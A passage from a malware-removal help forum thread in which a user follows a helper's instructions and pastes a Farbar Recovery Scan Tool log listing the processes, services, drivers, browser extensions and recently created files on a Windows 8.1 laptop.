    • You will be prompted to restart. Do not allow it by choosing Exit without restart.
  • Step 5

    Run your copy of FRST by double-clicking it.
    • Press the Scan button after.
    • It will produce FRST.txt on your desktop once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of this log in your next reply.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • FRST.txt (Farbar Recovery Scan Tool)
    • fixlog.txt (Farbar Recovery Scan Tool)
    • mbam-log-YYYY-MM-DD (HH-MM-SS).xml (Malwarebytes Anti-Malware)
    • TDSSKiller.*_*_*_log.txt (TDSSKiller)

#5
smwifey

    Member

  • Topic Starter
  • 85 posts

Tried to follow the directions to the letter.  One thing I am confused about is Step 1.  Was I supposed to paste that code into the FRST box before I pressed FIX?

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:30-07-2015
Ran by Richie (administrator) on RICHIE (30-07-2015 20:13:08)
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3030256 2013-05-16] (Synaptics Incorporated)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-06-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [782008 2015-07-15] (Avira Operations GmbH & Co. KG)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{406A6EC4-A42A-4564-810E-0501F8EED96A}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D51C3955-2AF3-49BA-9C94-C3C07B602A4D}: [DhcpNameServer] 192.168.254.254
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll [2012-04-26] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-27] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-05-11] ()
 
Chrome: 
=======
CHR Profile: C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-27]
CHR Extension: (Google Docs) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-27]
CHR Extension: (Google Drive) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-27]
CHR Extension: (YouTube) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-27]
CHR Extension: (Google Search) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-27]
CHR Extension: (Google Sheets) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-27]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-27]
CHR Extension: (Gmail) - C:\Users\Richie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [887128 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [461672 2015-07-15] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1213072 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [217280 2015-06-02] (Avira Operations GmbH & Co. KG)
S3 BthHFSrv; C:\Windows\System32\BthHFSrv.dll [324608 2014-11-21] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [113880 2015-07-30] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-30 19:54 - 2015-07-30 19:56 - 04404952 _____ (Kaspersky Lab ZAO) C:\Users\Richie\Desktop\tdsskiller.exe
2015-07-30 17:45 - 2015-07-30 17:45 - 00000000 ____D C:\Users\Richie\Desktop\FRST-OlderVersion
2015-07-29 20:49 - 2015-07-29 20:49 - 00030866 _____ C:\Users\Richie\Desktop\Addition.txt
2015-07-29 20:46 - 2015-07-30 20:13 - 00011546 _____ C:\Users\Richie\Desktop\FRST.txt
2015-07-29 17:42 - 2015-07-30 17:45 - 02168832 _____ (Farbar) C:\Users\Richie\Desktop\FRST64.exe
2015-07-28 19:59 - 2015-07-05 06:08 - 00300704 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-07-28 16:37 - 2015-07-28 16:39 - 00036677 _____ C:\Users\Richie\Downloads\Addition.txt
2015-07-28 16:37 - 2015-07-25 09:34 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-28 16:34 - 2015-07-30 20:13 - 00000000 ____D C:\FRST
2015-07-28 16:34 - 2015-07-28 16:39 - 00072365 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-30 20:12 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-30 18:21 - 00002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-30 19:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-30 19:52 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
